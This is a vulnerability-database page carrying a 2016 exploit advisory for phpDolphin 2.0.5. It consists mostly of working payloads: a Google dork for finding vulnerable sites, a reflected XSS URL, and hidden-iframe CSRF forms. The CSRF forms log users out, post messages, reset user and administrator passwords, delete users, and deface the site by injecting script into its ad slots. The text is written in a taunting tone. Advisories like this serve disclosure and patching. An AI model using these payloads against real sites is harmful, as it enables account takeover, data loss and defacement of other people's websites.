Vulners
Lucene search
phpDolphin 2.0.5 - Multiple Vulnerabilities
# Exploit Title: phpDolphin <= 2.0.5 CSRF
# Google Dork: intext:"Powered by phpDolphin"
# Date: January, 15th 2016
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://phpdolphin.com
# Version: 2.0.5
XSS (Reflected)
===============
> http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>
CSRF
====
We've found no protection against CSRF (Cross-site Request Forgery), which made possible to do any kind of act on a user (or admin) account.
NO FORMS are secured at all. But we've included some interesting examples. These examples execute actions on the user account while he's visiting a special page prepared by us in any other server. He won't know anything while visiting, as nothing is shown. Let's start from the basic:
Logging an user off
------------------
```
<img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />
```
It's good to remember that if the user kept the "remember me" on, there are cookies called "username" and (MD5-encoded) "password".
Posting on user's timeline
--------------------------
By changing the "group" input, it's also possible to post on groups.
```
Lorem ipsum dolor sit amet :)<br/>
Take a look on your profile ;)
<form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
<input type="hidden" name="message" value="HAXORED" />
<input type="hidden" name="privacy" value="1" />
<input type="hidden" name="group" value="" />
<input type="hidden" name="value" value="" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
Things can get a bit funnier.
Changing user password
----------------------
It's interesting that the change password form does NOT require the actual password. Just make sure "password" and "repeat_password" inputs have EXACTLY the same value.
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
<input type="hidden" name="password" value="hacked1" />
<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
Funny enough? Not?
So let's change the administration password too. Of course this page must be accessed by the administrator.
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
<input type="hidden" name="password" value="hacked1" />
<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
In order to open the admin panel, just visit `/index.php?a=admin`.
Want to delete some user? Just find out the user ID (numeric). For that, just open the user profile, view source (Ctrl + U), find (Ctrl + F) "userid". You will find two attributes "data-userid". That's the numeric user ID.
```
<img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />
```
Just want to mess everything up?
Hacking site index
==================
By adding Javascript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:
```
<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>
```
And this is our code:
```
<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
<input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script> document.getElementById('hackfrm').submit(); </script>
```
Enough?
Simply all forms are vulnerable to CSRF. These were just some.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2016 00:00Current
7.4High risk
Vulners AI Score7.4